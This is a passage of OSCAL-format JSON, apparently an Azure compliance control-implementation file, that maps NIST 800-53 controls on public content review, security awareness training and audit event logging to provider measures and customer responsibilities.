This review occurs as part of the normal change management processes."}],"responsibilities":[{"uuid":"7c170ee1-dbc5-4cae-bc2f-16510337cc42","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-089"}],"description":"The customer is responsible for reviewing proposed content of customer-controlled information prior to posting publicly to ensure nonpublic information is not included.","provided-uuid":"8bdda9f6-c89c-4d9a-be79-bac73d151591"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0e4d6254-cc09-4931-89dd-c56301a89796","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-090"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"ac-22_smt.d","by-components":[{"uuid":"b3d33581-eac4-47aa-af6a-07375694c2e0","export":{"provided":[{"uuid":"8e8d9a8d-3264-44bf-96d6-01a2def276e9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-090"}],"description":"The Marketing Communications team leverages an automated tool to measure volume and sentiment for social conversations around products, events, announcements, and crises. The automated tool gathers data using a number of different methods, including web crawlers, direct relationships, and various Application Programming Interfaces (APIs). The tool actively collects Microsoft mentions across Twitter, news sites, forums, blogs, and general public sites. The automated tool provides alerts to the Marketing Communications team based on configuration. 
On a monthly cadence, the Marketing Communications team prepares a Cloud Blog and Social Cloud Marketing report to manage ecosystem performance, workload performance, followers, posts, and engagements across different platforms. If any nonpublic information is identified through the automated tool alerts or in the process of producing the Cloud Blog and Social Marketing report, the Azure incident response process is followed through crisis communications to investigate and remediate the issue."}],"responsibilities":[{"uuid":"6133444b-d6db-4ac0-854e-6eba6e6f18f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AC-01-090"}],"description":"The customer is responsible for periodically reviewing publicly available customer-controlled content for nonpublic information.","provided-uuid":"8e8d9a8d-3264-44bf-96d6-01a2def276e9"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"45e3a803-3148-45a9-9f78-56a494bc3c6a","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"at-2","statements":[{"uuid":"f2c329ea-bdcd-4e59-84ce-98d022746733","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-006"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-2_smt.a","by-components":[{"uuid":"4a1f4735-b740-4dc7-a1d9-f03189309beb","export":{"provided":[{"uuid":"6e20e262-16ff-41d5-9209-c24737a93cc0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":
"acf-id","value":"AT-02-006"}],"description":"The annual Security Foundations Training includes basic level training on how to detect, report and implement best practices to safeguard Microsoft and its customers. This course also covers the security requirements and expectations for elevated privileges in production environments. Engineering personnel participate in ongoing role-based security training through the STRIKE program. STRIKE provides regular 200-400 level sessions, labs, online courses, and material to engage, educate, and empower engineers to securely design and operate services. Azure requires all personnel to complete the following training as part of their onboarding process: * Security Foundations Training - Azure new hire personnel are required to take the Security Foundations Training within thirty (30) days of employment, and annually thereafter. STRIKE training, covering security topics for engineering roles is recommended as part of continued learning."}],"responsibilities":[{"uuid":"69003d93-f27d-46f4-9755-d7de9d5858f9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-006"}],"description":"The customer is responsible for providing basic security awareness training to all users of customer-deployed resources as part of initial training.","provided-uuid":"6e20e262-16ff-41d5-9209-c24737a93cc0"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"39934c96-4a5e-4b87-990a-8ea60258c8bc","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-007"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-2_smt.b","by-components":[{"uuid":"3a9a91af-267a-4927-addf-6a1a5b9f3f2b","export":{"provided":[{"uuid":"fc650d6b-7d3e-4d06-b766-23aae789bdd8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-007"}],"description":"STRIKE and Security Foundations trainings are updated on a regular basis to account for updates or changes that render previous training inaccurate. The trainings are sent to personnel supporting the operations of Azure cloud environments through automated learning system communications. 
Training completions are documented and retained for investigation purposes."}],"responsibilities":[{"uuid":"076117ee-7358-49f7-837d-093786507c05","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-007"}],"description":"The customer is responsible for providing updated basic security awareness training to all users when required by changes to customer-deployed resources.","provided-uuid":"fc650d6b-7d3e-4d06-b766-23aae789bdd8"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"050d1169-e3f8-4fda-bb07-879ea6026366","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-008"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-2_smt.c","by-components":[{"uuid":"09525b0b-2d9e-4a58-962e-75f89a2eceb4","export":{"provided":[{"uuid":"10db2330-af51-44e2-9cd0-6d4b1719c801","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-008"}],"description":"The annual Security Foundations Training includes basic level training on how to detect, report and implement best practices to safeguard Microsoft and its customers. Engineering personnel are recommended to participate in ongoing role-based security training through the STRIKE program. 
STRIKE provides regular 200-400 level sessions, labs, online courses, and materials to engage, educate and empower engineers to securely design and operate services."}],"responsibilities":[{"uuid":"1607ad79-b3dd-4fa7-b47a-20a739f7575a","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-008"}],"description":"The customer is responsible for providing ongoing, periodic basic security awareness training to all users.","provided-uuid":"10db2330-af51-44e2-9cd0-6d4b1719c801"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2f0476bb-c260-4f24-b709-6db6eee3c341","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"at-2.2","statements":[{"uuid":"a40311f0-465b-4382-a18c-c01dc32d7cd2","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-2.2_smt","by-components":[{"uuid":"4e52c6ee-be7a-4cbe-9413-c181dd2cb0ec","export":{"provided":[{"uuid":"8316467c-8cdb-4c0b-8555-41a0ab5c4746","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-009"}],"description":"The annual Security Foundations Training includes information on recognizing and reporting potential indicators of insider threat, as well as instruction on reporting suspicious or anomalous behavior in production environments. 
All personnel with elevated access to Azure are required to complete the Security Foundations course or participate in STRIKE. Course completion is required to maintain current account access and prior to the provisioning of any new accounts."}],"responsibilities":[{"uuid":"c05d2210-aa19-443f-b832-c603829df976","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-009"}],"description":"The customer is responsible for providing training on insider threats.","provided-uuid":"8316467c-8cdb-4c0b-8555-41a0ab5c4746"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"acadef8f-2c31-48c8-87b8-c60a1f2d2178","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"at-2.3","statements":[{"uuid":"ef947763-2d35-4b80-95bb-e3d01e599501","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-2.3_smt","by-components":[{"uuid":"75a243e8-d729-4b58-9068-a7165845fab4","export":{"provided":[{"uuid":"f8afd7de-beaa-4080-a6e0-206be1696002","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-010"}],"description":"The annual STRIKE or Security Foundations Training includes basic-level training on how to detect and report social engineering and social mining attempts, including methods such as dumpster diving, phishing, pretexting, shoulder surfing, baiting, quid pro quo, thread-jacking, social media exploitation, 
tailgating, and telephone impersonation."}],"responsibilities":[{"uuid":"9e608dc9-2d70-4671-9617-c6be60b64fa4","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-010"}],"description":"The customer is responsible for providing literacy training and awareness for their own personnel.","provided-uuid":"f8afd7de-beaa-4080-a6e0-206be1696002"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"606e7bf5-1abc-4368-a0f2-4d6e81e3dd8e","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"at-3","statements":[{"uuid":"91a38ead-cbf7-428d-a7ff-3d882e480532","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-011"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-3_smt.a","by-components":[{"uuid":"9d0e1b93-c640-4ae0-b658-3e3bbae9ca09","export":{"provided":[{"uuid":"719a6775-9971-42a9-96de-367de67c1bc1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-011"}],"description":"Microsoft C+AI training and awareness components are classified into one of two types: Role-Based and Required. Role-Based Training: Role-Based training is provided to facilitate the understanding of security processes and procedures for a particular role an individual is placed in and is directly related to the job responsibilities of the individual. 
Role-Based training is offered to full-time personnel through the STRIKE program for engineering disciplines, providing 200-400 level security training and best practices. Required Training: Required training is mandatory security and awareness education that the Information Risk Management Council (IRMC) has specifically identified and defined as appropriate for Azure personnel based upon their organization. Required annual training includes Security Foundations Training for new hires and non-engineering FTEs and the STRIKE program for engineering FTEs; STRIKE training also provides continual learning for those in engineering roles. Azure personnel are required to take the above trainings as required by information system changes."}],"responsibilities":[{"uuid":"01b0c8ee-e8d7-4a48-8382-5845cd8e5694","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-011"}],"description":"The customer is responsible for providing role-based security training to users before authorizing access to customer-deployed resources or performing assigned duties. 
The customer is also responsible for providing role-based security training to all identified roles when required by changes to customer-deployed resources.","provided-uuid":"719a6775-9971-42a9-96de-367de67c1bc1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c1cd9573-5a53-4bcd-b685-d49446cac88f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-012"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-3_smt.b","by-components":[{"uuid":"bf4237cd-a125-43df-a892-7edce4e4f430","export":{"provided":[{"uuid":"cf9c3bc8-dd2d-41af-bfeb-456d3451631d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-012"}],"description":"Azure updates role-based training content through the STRIKE program on at least an annual basis."}],"responsibilities":[{"uuid":"29644c04-4e94-4ca3-b3c0-f20da932fb10","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-012"}],"description":"The customer is responsible for updating role-based training at a defined frequency for customer-deployed resources.","provided-uuid":"cf9c3bc8-dd2d-41af-bfeb-456d3451631d"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"5cafbe59-ffbe-40bd-8da2-40fa0b348138","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-013"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-3_smt.c","by-components":[{"uuid":"760ea4d9-e824-444f-b0c4-24ef2ad687fd","export":{"provided":[{"uuid":"afa43893-aee7-4d1a-9177-32fc227b6e1f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-013"}],"description":"Personnel are required to take the above training on an annual basis. Azure confirms a user has taken the training through the Microsoft Learning Program. Microsoft management communicates this responsibility to all applicable managers who grant access to Azure data. The Microsoft Learning Program incorporates lessons learned from internal and external security incidents or breaches into the role-based trainings executed through the STRIKE program."}],"responsibilities":[{"uuid":"c0556fdb-f22f-465d-b177-75d27044e994","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-013"}],"description":"The customer is responsible for providing ongoing, periodic role-based security training to all identified roles. 
The customer is also responsible for incorporating lessons learned from internal or external security incidents or breaches into role-based training for customer-deployed resources.","provided-uuid":"afa43893-aee7-4d1a-9177-32fc227b6e1f"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b0049a50-28d3-4859-855d-bc7a857a55bb","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"at-4","statements":[{"uuid":"1db9b4da-f958-4b36-88ed-8c9a1af9c65f","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-014"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-4_smt.a","by-components":[{"uuid":"788096ff-d5a3-44b6-aef9-ebc6c27ab9cb","export":{"provided":[{"uuid":"7e1f01f3-a4e3-407e-a999-4860f5d4b07d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-014"}],"description":"Azure utilizes SuccessFactors Learning Management System (LMS) to document and monitor security and privacy training. The LMS provides reporting to effectively manage and track security training participation. 
Security training and privacy training records are documented, monitored, and retained for at least five (5) years."}],"responsibilities":[{"uuid":"0fed5d9b-465c-410a-ba58-54f0615db119","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-014"}],"description":"The customer is responsible for documenting and monitoring all system security and privacy training activities for customer-deployed resources.","provided-uuid":"7e1f01f3-a4e3-407e-a999-4860f5d4b07d"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"c65d7043-8532-492c-b954-28a08b52ce89","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-015"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"at-4_smt.b","by-components":[{"uuid":"5f2d6b4f-c9a3-4b84-873f-fdde9637ee24","export":{"provided":[{"uuid":"fd2b9a9d-bc8f-45c5-ad8c-114f732dc7c0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-015"}],"description":"Azure retains records of all security training for at least five (5) years in the LMS."}],"responsibilities":[{"uuid":"e521b74f-ff06-4374-8f50-f7684c317dea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AT-02-015"}],"description":"The customer is responsible for retaining individual training records for users of customer-deployed resources.","provided-uuid":"fd2b9a9d-bc8f-45c5-ad8c-114f732dc7c0"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2f5a031a-573a-467a-864c-b6682c4765c8","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"technical"}],"control-id":"au-2","statements":[{"uuid":"faf42a4e-aef0-42c1-985c-9f456205c170","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-2_smt.a","by-components":[{"uuid":"0313309a-8f11-450b-aa5d-78d9179bacd6","export":{"provided":[{"uuid":"d3b9a6a9-a2e6-40ec-a9a7-dbf1459e9cfe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-006"}],"description":"The Azure Security Logging and Monitoring (SLAM) team and the Security Response Team have developed sets of auditable events for Azure assets based on ongoing risk assessments of the system which incorporate government and industry baselines and requirements, identified vulnerabilities, business requirements, and Azure and C+AI Security Standards. The event sets are reviewed by the SLAM and Security Response Team when a significant change to the system is made to ensure any vulnerabilities exposed are being addressed by the set of auditable events. New events are incorporated when a new asset class is brought online or when a vulnerability or threat is identified through security assessments, security bulletins, and more. Azure Security Pack (AzSecPack) and Geneva Monitoring, composed of Logs, Metrics, and Analytics, are the main drivers of audit log collection. 
AzSecPack is deployed via the Geneva Monitoring Agent (MA), covering both Windows and Linux operating systems and operating as the raw event source. AzSecPack monitors events throughout the Azure environment in an automated fashion, feeding logs through Azure Security Monitoring (ASM), Kusto, and SCUBA to identify and alert on events of interest. Personnel can use Kusto and Jarvis to examine the logs in human-readable format. All asset types supporting Azure's cloud environments are configured to log the following events: Successful and unsuccessful account logon events, successful and unsuccessful attempts to access, modify, or delete privileges, account management events, privileged activities, security objects, security levels, or categories of information (e.g., classification levels), object access, policy change, privilege functions, process tracking, starting and ending time for user access to the system, concurrent logons from different workstations, successful and unsuccessful accesses to objects, all program initiations, all direct access to the information system, all account creations, modifications, disabling, and terminations, all kernel module loads and unloads, all administrator activity, authentication checks, authorization checks, data deletions, data access, data changes, and permission changes and restart, and system events. Servers: For server assets, the audit policy is set as part of installing AzSecPack on a given server, required for Azure. AzSecPack collects all server asset logs and sends them to the Geneva Monitoring Agent (MA), a client executable that is run on the asset to collect logs and upload them to Azure storage accounts owned by the service team. Geneva Monitoring then ingests and analyzes the logs via multiple detection services, including but not limited to Azure Security Monitoring (ASM), Kusto, and SCUBA, for events requiring alerting. 
Network Devices: Utilizing the audit log collection tool protocol and event collection infrastructure, Azure retrieves events from network device syslog. The logs are sent to servers running AzSecPack for storage and processing for format and content via Geneva Monitoring. Geneva Monitoring then ingests and analyzes the logs via multiple detection services, including but not limited to Azure Security Monitoring (ASM), Kusto, and SCUBA, for events requiring alerting. Azure Services: Service teams configure their service to generate audit logs based upon the service-specific risk assessment. Service teams are responsible for configuring service-layer audit logs as a part of the Security Development Lifecycle (SDL) process using the OpenTelemetry Audit instrumentation, feeding into the Geneva MA and the pipeline described above."}],"responsibilities":[{"uuid":"dd65d89a-631c-4be1-8ef1-56c15f1710c6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-006"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for identifying the types of events that the customer-deployed resources are capable of logging.","provided-uuid":"d3b9a6a9-a2e6-40ec-a9a7-dbf1459e9cfe"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1f9ad09b-2278-4818-aaeb-212b1c182ba6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-2_smt.b","by-components":[{"uuid":"4ccde4ad-a99f-4753-85b0-70c9684fb6c0","export":{"provided":[{"uuid":"5984a157-d29f-4c10-9baf-15b1f8fb1544","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-007"}],"description":"Azure incorporates business requirements from Azure as a whole and from individual service teams when developing the set of auditable events. The Azure Security team meets on a formal and regular basis to coordinate and collaborate on security, auditing, and monitoring objectives."}],"responsibilities":[{"uuid":"b8e6599b-325b-447d-afcd-633c2a2f8be8","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-007"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for coordinating with other entities within its organization to guide the selection of auditable events for customer-deployed resources.","provided-uuid":"5984a157-d29f-4c10-9baf-15b1f8fb1544"}]},"description":"See inheritance and customer responsibility 
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"b821c5f3-79d6-4bb3-b959-740b038eb4a5","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-008"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-2_smt.c","by-components":[{"uuid":"932104c6-a658-4e08-b87f-af67836457ca","export":{"provided":[{"uuid":"00d5af57-8689-4c96-a9f2-50136652f55e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-008"}],"description":"Servers: The configuration file for AzSecPack specifies the audit events. Events are audited continually in near-real time. These events are based on the assessment of risk to the system and the Microsoft Security Standards used across the organization. These events align with the server baselines updated semi-annually and available to all Microsoft users. 
Network Devices: While each network device type has specific events and metadata options, Azure Networking selects the level of auditing to meet or exceed the audited events defined by the Azure SLAM team and configures the devices appropriately."}],"responsibilities":[{"uuid":"bb16e3bc-a53f-448b-9b69-8a77ba143b44","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-008"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for selecting a subset of the events defined in AU-02.a to be audited on customer-deployed resources.","provided-uuid":"00d5af57-8689-4c96-a9f2-50136652f55e"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"0a48d51c-5677-4df4-a80b-8084fcef883d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-009"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-2_smt.d","by-components":[{"uuid":"0eabeac7-0436-430a-a8e2-a40614332bb1","export":{"provided":[{"uuid":"73536957-3cd3-4049-914c-08fabf94b881","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-009"}],"description":"Designated Azure personnel select which auditable events are to be audited, and Azure assets generate such audit records which enable Azure Security to support after-the-fact investigations of security incidents. The Security Response Team is involved in determining which events should be audited to support the incident management process and it has been determined that the selected events are sufficient to support the after-the-fact investigations of security incidents. 
Azure performs a review of the events to be audited within Azure at least annually, using several sources of input including security architects, incident management personnel, security analysts, and system operators, to determine that the list of auditable events is adequate to support after-the-fact investigations of security incidents."}],"responsibilities":[{"uuid":"fe4b0df7-5df9-4384-9bdf-9de46c8b100c","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-009"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for ensuring the list of auditable events supports after-the-fact investigations of customer-deployed resources.","provided-uuid":"73536957-3cd3-4049-914c-08fabf94b881"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"1e483acb-e032-4c78-83ed-cd0211fb97d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-010"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"au-2_smt.e","by-components":[{"uuid":"cae4bbfa-ffb9-476d-a339-bcafeca63731","export":{"provided":[{"uuid":"89a26c9e-b41c-4964-96aa-46ff0415e4cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-010"}],"description":"Azure Security reviews the events to be audited within Azure at least annually using several sources of input, including the Security Engineering Team, Service Engineer Operations, Azure Engineers, Azure security architects, incident management personnel, Azure security analysts, and system operators to determine whether the list of auditable events is adequate to support after-the-fact 
investigations of security incidents. C+AI Security also reviews the events to be audited whenever changes in the threat environment are identified internally or communicated to Azure by the FedRAMP JAB, DISA/DoD authorizing officials, and other regulators as required. If updates are needed, C+AI Security updates the list upon completion of the review. In addition to the annual and threat-based reviews, C+AI Security performs ongoing reviews of rule sets when Security Response Team Tier 2 personnel process events. If the rule sets are deemed insufficient because of an event review, after being vetted by the Security Response Team leader, feature requests are placed into the bug tracking tool to change rules to the auditable events. These changes are subject to peer review."}],"responsibilities":[{"uuid":"e290fc10-105b-4670-bc37-6d215a12ace0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"AU-03-010"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for reviewing and updating the event types selected for logging on customer-deployed resources at least annually.","provided-uuid":"89a26c9e-b41c-4964-96aa-46ff0415e4cd"}]},"description":"See inheritance and customer responsibility 
